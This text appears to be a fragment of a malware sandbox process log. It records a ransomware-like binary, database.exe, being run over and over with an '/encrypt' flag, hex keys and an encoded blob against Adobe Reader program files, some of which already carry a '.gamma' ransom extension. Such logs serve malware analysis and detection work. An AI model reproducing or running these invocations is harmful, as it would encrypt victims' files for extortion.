C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32Info.exe"5⤵PID:4660
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRdIF.dll"5⤵PID:268
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe"5⤵PID:5452
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe"5⤵PID:1740
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeLinguistic.dll"5⤵PID:5944
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini.id-DA208E5B.[[email protected]].gamma"5⤵PID:2604
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ahclient.dll"5⤵PID:3700
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\authplay.dll"5⤵PID:4768
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AXE8SharedExpat.dll"5⤵PID:956
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AXSLE.dll"5⤵PID:3920
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\BIBUtils.dll"5⤵PID:3788
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ccme_base.dll"5⤵PID:4268
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\CoolType.dll"5⤵PID:4088
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.dll"5⤵PID:6036
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"5⤵PID:4016
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\icudt36.dll"5⤵PID:3812
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\JP2KLib.dll"5⤵
- System Location Discovery: System Language Discovery
PID:3420
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\logsession.dll"5⤵PID:5868
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"5⤵PID:4364
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Onix32.dll"5⤵
- System Location Discovery: System Language Discovery
PID:4764
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\reader_sl.exe"5⤵
- System Location Discovery: System Language Discovery
PID:5800
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\rt3d.dll"5⤵PID:4456
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der.id-DA208E5B.[[email protected]].gamma"5⤵PID:3908
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\sqlite.dll"5⤵PID:2780
-
-
